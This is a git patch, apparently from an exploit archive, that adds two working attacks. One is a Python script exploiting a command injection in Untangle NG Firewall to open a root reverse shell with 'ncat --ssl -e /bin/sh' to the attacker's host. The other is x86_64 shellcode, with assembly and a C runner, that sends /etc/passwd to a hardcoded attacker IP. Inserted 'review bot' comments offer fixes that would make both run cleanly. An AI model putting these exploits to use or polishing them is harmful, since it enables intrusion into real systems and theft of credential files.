From 94e65060ade1e594fdbaa9d3cd45eccb714f1f3a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 29 Jun 2016 05:06:40 +0000
Subject: [PATCH] DB: 2016-06-29 2 new exploits
Linux x86_64 /etc/passwd File Sender Shellcode
Untangle NGFW 12.1.0 beta - execEvil() Command Injection
---
 files.csv | 2 +
 platforms/json/webapps/40030.py | 75 +++++++++
 platforms/lin_x86-64/shellcode/40029.c | 212 +++++++++++++++++++++++++
 3 files changed, 289 insertions(+)
 create mode 100755 platforms/json/webapps/40030.py
 create mode 100755 platforms/lin_x86-64/shellcode/40029.c
diff --git a/files.csv b/files.csv
index a7d2c6a32..b95c5ac5d 100755
--- a/files.csv
+++ b/files.csv
@@ -36202,3 +36202,5 @@ id,file,description,date,author,platform,type,port
 40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
 40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80
 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
+40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80
diff --git a/platforms/json/webapps/40030.py b/platforms/json/webapps/40030.py
new file mode 100755
index 000000000..fcd1f00c6
--- /dev/null
+++ b/platforms/json/webapps/40030.py
@@ -0,0 +1,75 @@
+#!/usr/bin/python
+
+# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
+# CVE: (Not yet assigned)
+# Discovery: Matt Bush (@3xocyte)
+# Exploit: Matt Bush
+# Contact: mbush@themissinglink.com.au
+
+# Disclosure Timeline:
+# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities
+# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
+# 12/5/2016 US-CERT confirms contacting vendor
+# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
+# 27/6/2016 Public disclosure
+
+# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
+# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous
+# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
+# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
+
+# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
+
+import json, requests, sys
+
+if len(sys.argv) < 5:
+ print "[!] usage: " + sys.argv[0] + " "
+ print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
+ sys.exit()
+
+print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
+print " by @3xocyte\n"
+
+rhost = sys.argv[1]
+lhost = sys.argv[2]
+username = sys.argv[3]
+password = sys.argv[4]
+
+login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
+rpc_url = "http://" + rhost + "/webui/JSON-RPC"
+auth = {'username': username, 'password': password}
+
+print "[*] Opening session..."
+session = requests.Session()
+
+print "[*] Authenticating..."
+try:
+ login = session.post(login_url, data=auth)
+ get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
+ req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
+ data = json.loads(req_nonce.text)
+ nonce = data['result']
+except:
+ print "[!] Authentication failed. Quitting."
+ sys.exit()
+
+print "[*] Getting execManager objectID..."
+try:
+ get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
+ req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
+ data = json.loads(req_obj_id.text)
+ object_id = data['result']['execManager']['objectID']
+
+except:
+ print "[!] Could not get execManager objectID. Quitting."
+ sys.exit()
+
+print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
+try:
+ exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
+ session.post(rpc_url, data=json.dumps(exploit))
+except:
+ print "[!] Exploit failed. Quitting."
+ sys.exit()
+
+print "[*] Exploit sent!"
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/40029.c b/platforms/lin_x86-64/shellcode/40029.c
new file mode 100755
index 000000000..42fd5c985
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40029.c
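Review bot: The banner at `print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"` contradicts the header comment, which gives the tested range as `<= v12.1.0 beta` and lists 12.1.0 beta among tested versions; one of the two should be corrected so the affected-version claim is consistent. The usage line `print "[!] usage: " + sys.argv[0] + " "` prints nothing after the script name — the four positional placeholders appear to have been lost (possibly angle-bracket tokens stripped in rendering, so worth checking against the original), and the message should name the `rhost lhost username password` order the code reads from `sys.argv[1]` to `sys.argv[4]`. The three bare `except:` clauses also catch `KeyboardInterrupt` and `SystemExit` and discard the actual error, so a connection failure and an unexpected JSON shape print the same message; `except Exception as e:` with `e` included in the output would keep the failure modes distinguishable. The statement-form `print` makes the file Python 2 only, which the `#!/usr/bin/python` shebang does not make explicit.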
@@ -0,0 +1,212 @@
+/*
+ # Title : Linux x86_64 /etc/passwd file sender shellcode
+ # Date : 28-06-2016
+ # Author : Roziul Hasan Khan Shifat
+ # Tested On : Ubuntu 14.04 LTS x86_64
+*/
+
+
+/*
+
+Disassembly of section .text:
+
+0000000000400080 <_start>:
+ 400080: 48 31 c0 xor %rax,%rax
+ 400083: b0 39 mov $0x39,%al
+ 400085: 0f 05 syscall
+ 400087: 99 cltd
+ 400088: 48 39 d0 cmp %rdx,%rax
+ 40008b: 74 07 je 400094
+ 40008d: 48 31 c0 xor %rax,%rax
+ 400090: b0 3c mov $0x3c,%al
+ 400092: 0f 05 syscall
+
+0000000000400094 :
+ 400094: b2 06 mov $0x6,%dl
+ 400096: 48 31 f6 xor %rsi,%rsi
+ 400099: 48 ff c6 inc %rsi
+ 40009c: 40 b7 02 mov $0x2,%dil
+ 40009f: 48 31 c0 xor %rax,%rax
+ 4000a2: b0 29 mov $0x29,%al
+ 4000a4: 0f 05 syscall
+ 4000a6: 4d 31 c0 xor %r8,%r8
+ 4000a9: 49 89 c0 mov %rax,%r8
+ 4000ac: 48 31 c0 xor %rax,%rax
+ 4000af: 99 cltd
+ 4000b0: 48 31 ff xor %rdi,%rdi
+ 4000b3: 48 31 f6 xor %rsi,%rsi
+ 4000b6: 50 push %rax
+ 4000b7: 50 push %rax
+ 4000b8: 50 push %rax
+ 4000b9: c6 04 24 02 movb $0x2,(%rsp)
+ 4000bd: 66 c7 44 24 02 05 c0 movw $0xc005,0x2(%rsp)
+ 4000c4: c7 44 24 04 c0 a8 56 movl $0x8056a8c0,0x4(%rsp)
+ 4000cb: 80
+ 4000cc: 48 89 e6 mov %rsp,%rsi
+ 4000cf: b2 10 mov $0x10,%dl
+ 4000d1: 4c 89 c7 mov %r8,%rdi
+
+00000000004000d4 :
+ 4000d4: 48 31 c0 xor %rax,%rax
+ 4000d7: b0 2a mov $0x2a,%al
+ 4000d9: 0f 05 syscall
+ 4000db: 4d 31 c9 xor %r9,%r9
+ 4000de: 4c 39 c8 cmp %r9,%rax
+ 4000e1: 75 f1 jne 4000d4
+ 4000e3: 48 31 c0 xor %rax,%rax
+ 4000e6: 48 31 f6 xor %rsi,%rsi
+ 4000e9: 50 push %rax
+ 4000ea: 50 push %rax
+ 4000eb: 50 push %rax
+ 4000ec: c7 04 24 2f 65 74 63 movl $0x6374652f,(%rsp)
+ 4000f3: c7 44 24 04 2f 2f 70 movl $0x61702f2f,0x4(%rsp)
+ 4000fa: 61
+ 4000fb: c7 44 24 08 73 73 77 movl $0x64777373,0x8(%rsp)
+ 400102: 64
+ 400103: 48 89 e7 mov %rsp,%rdi
+ 400106: b0 02 mov $0x2,%al
+ 400108: 0f 05 syscall
+ 40010a: 48 89 c6 mov %rax,%rsi
+ 40010d: 4c 89 c7 mov %r8,%rdi
+ 400110: 99 cltd
+ 400111: 66 41 ba 88 13 mov $0x1388,%r10w
+ 400116: 48 31 c0 xor %rax,%rax
+ 400119: b0 28 mov $0x28,%al
+ 40011b: 0f 05 syscall
+ 40011d: 48 31 c0 xor %rax,%rax
+ 400120: b0 3c mov $0x3c,%al
+ 400122: 0f 05 syscall
+
+*/
+
+
+/*
+
+section .text
+ global _start
+_start:
+
+xor rax,rax
+mov al,57
+syscall
+
+cdq
+cmp rax,rdx
+jz send
+
+xor rax,rax
+mov al,60
+syscall
+
+send:
+;----------------
+;connecting to server
+;-------------------------
+
+;creating socket
+
+
+mov dl,6
+xor rsi,rsi
+inc rsi
+mov dil,2
+
+
+xor rax,rax
+mov al,41
+syscall
+
+;---------------------
+xor r8,r8
+mov r8,rax ;socket descriptor
+
+;----------------------------
+;connecting.............
+
+;struct sockaddr_in 16 bytes
+;sin_family 2 bytes
+;sin_port 2 bytes
+;sin_addr 4 bytes
+
+
+xor rax,rax
+cdq
+xor rdi,rdi
+xor rsi,rsi
+
+
+push rax
+push rax
+push rax
+
+mov [rsp],byte 2
+mov [rsp+2],word 0xc005 ;port 1472 (change it if U want)
+mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP
+
+mov rsi,rsp
+
+mov dl,16
+
+mov rdi,r8
+
+connect:
+xor rax,rax
+mov al,42
+syscall
+
+xor r9,r9
+cmp rax,r9
+jnz connect
+
+;------------------------------
+;opennig /etc/passwd
+
+xor rax,rax
+xor rsi,rsi
+
+push rax
+push rax
+push rax
+
+mov [rsp],dword '/etc'
+mov [rsp+4],dword '//pa'
+mov [rsp+8],dword 'sswd'
+
+mov rdi,rsp
+
+mov al,2
+syscall
+;----------------------
+
+
+
+;sending...............
+mov rsi,rax ;in_fd
+mov rdi,r8 ;out_fd
+cdq
+mov r10w,5000
+xor rax,rax
+mov al,40
+syscall
+;--------------
+
+;exiting
+
+xor rax,rax
+mov al,60
+syscall
+
+*/
+
+
+#include
+#include
+
+char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05";
+
+main()
+{
+printf("shellcode length %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
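Review bot: Both `#include` directives near the end of the hunk carry no header name, so the file as shown does not compile; `printf` and `strlen` need `<stdio.h>` and `<string.h>`, and the blank directives look like angle-bracket tokens lost in rendering rather than an authoring error, which is worth confirming against the original. `main()` is written with implicit `int` and no return statement, a form C99 and later compilers reject; `int main(void)` with a trailing `return 0;` is the portable spelling. The connect-back port and address are described only in the NASM comment (`;port 1472 (change it if U want)`, `;change it to attacker IP`), while the `char shellcode[]` array gives no indication that it must be regenerated from the assembly after such an edit, so a one-line comment above the array stating that it is a verbatim assembly of the commented source would make the header's instructions followable. The objdump listing has lost its `<send>` and `<connect>` labels (the lines now read `0000000000400094 :` and `00000000004000d4 :`), which is likely the same rendering issue and worth restoring for readability.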